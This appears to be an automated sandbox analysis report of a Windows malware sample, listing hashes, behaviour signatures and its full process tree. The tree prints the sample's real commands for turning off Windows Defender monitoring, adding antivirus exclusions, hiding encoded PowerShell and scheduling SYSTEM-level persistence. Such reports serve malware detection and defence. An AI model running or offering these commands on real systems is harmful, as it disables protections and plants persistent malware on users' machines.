Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
19/10/2022, 13:11
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
cb0f9489fbc24ff67282a69b6755afc1
-
SHA1
6aed188a3317a00f57b54305eacad92f3696e0c7
-
SHA256
ba22111769947aa2cd2e8b127d47999b03a4e695486a5df899230168f1182ca5
-
SHA512
9f79891467a8145d00f43fba0b3455b1442ce9973185bd21b30e833e6e2dae4bc0e596636e1d51739f1f5057553d0c4272fdf2adfe47768d15d31354dbc5d9c4
-
SSDEEP
196608:91OVjkSDnKemniDFmxfeS82jbU+ttCsrLQY1vfNDjqRfbMbUX:3OR5nKH8FmxWS8yblttfRBNObLX
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 21 IoCs
-
Drops file in Program Files directory 10 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSF632.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFC0C.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gctztKeBv" /SC once /ST 07:31:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gctztKeBv"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gctztKeBv"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxLHRKpEAJQThoYlam" /SC once /ST 13:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\WMCjrFl.exe\" Xi /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E66AAD9E-58B4-4B82-BACC-EEAFB851CF00} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {69DB194C-E5F5-4FB9-86AB-A617FC5E8F4F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\WMCjrFl.exeC:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\WMCjrFl.exe Xi /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHPVCYcxJ" /SC once /ST 06:47:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHPVCYcxJ"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHPVCYcxJ"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZZCXxdZr" /SC once /ST 07:10:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZZCXxdZr"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZZCXxdZr"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\BSCTWiFJDtUitSTE\STEJCRBN\LGhwcieSPXKIPLuH.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\BSCTWiFJDtUitSTE\STEJCRBN\LGhwcieSPXKIPLuH.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gShyMwjxa" /SC once /ST 02:12:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gShyMwjxa"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gShyMwjxa"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ebHKJInuomVbGemVL" /SC once /ST 10:15:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\BSCTWiFJDtUitSTE\ZGDzrYGnlTeNTtK\zxjZkXd.exe\" cu /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ebHKJInuomVbGemVL"3⤵
-
-
-
C:\Windows\Temp\BSCTWiFJDtUitSTE\ZGDzrYGnlTeNTtK\zxjZkXd.exeC:\Windows\Temp\BSCTWiFJDtUitSTE\ZGDzrYGnlTeNTtK\zxjZkXd.exe cu /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bxLHRKpEAJQThoYlam"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\etvgnoeTU\QMdqYz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ovXByvBxoEsnrcO" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ovXByvBxoEsnrcO2" /F /xml "C:\Program Files (x86)\etvgnoeTU\AnhvEZe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ovXByvBxoEsnrcO"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ovXByvBxoEsnrcO"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VCUuedamaIKles" /F /xml "C:\Program Files (x86)\dgYCiexoFJqU2\DCLIRqz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WdcZyJlKMMtFI2" /F /xml "C:\ProgramData\gNyejqXGwyEfnHVB\tYSuGlO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cwyJwQWzJDHgzLjgQ2" /F /xml "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR\CdAKodZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1800937562-13614866591068417212-63124928520487177551543673504-13827846391430726999"1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d7d30c48816e5545514c75dd279d002c
SHA13112445d1cc4f93b15f7119239ce94f37927c7f6
SHA256d436f7aa53dcebf7851f0fef5e2c52da783a1cc91bd2080edaa95522a3b39042
SHA51266533433a750c8d235a04b6e0f622f24298b9f64dfd9df1e2cd4aab9431a899e9009a3d3db34d0a8dc549d7f5513cda84f89fe1c9f2b6f0fe7e297c039f06251
-
Filesize
2KB
MD5e04b24c74cb8d3a8cd61e1848273e8e0
SHA1951448ad0fe9203ef36fa57b892ba25ef5b81279
SHA25668874ef3cf83c09a9170029ff85942f1d1050abe15ad996e9dde8fd05bb8256a
SHA512d7a9ce32e6bd1ab566cb9065923fbdeccfbd67fe2c2404bbaf1f9a0d5509f9c4667da56b4d0f4f886840cf21445ca8b6e825e59bc3f022e1da37cdb716ea2705
-
Filesize
2KB
MD5046a8e68405705b8c83227d3714e91a6
SHA1963b126c7bdeb85d3318c62c92b6122a3442c640
SHA25601a94cfed6428ccd047e2cf74669748b937d2e9b5da659805329241b986ee710
SHA51209a830ed21e45d80fe46de57afa0624fff293c8eb01385a2b01bb9d86dbf0b4ad893f4e4f155445c2729624c432f60f6d6ba351fa99f17d039c83b6030404011
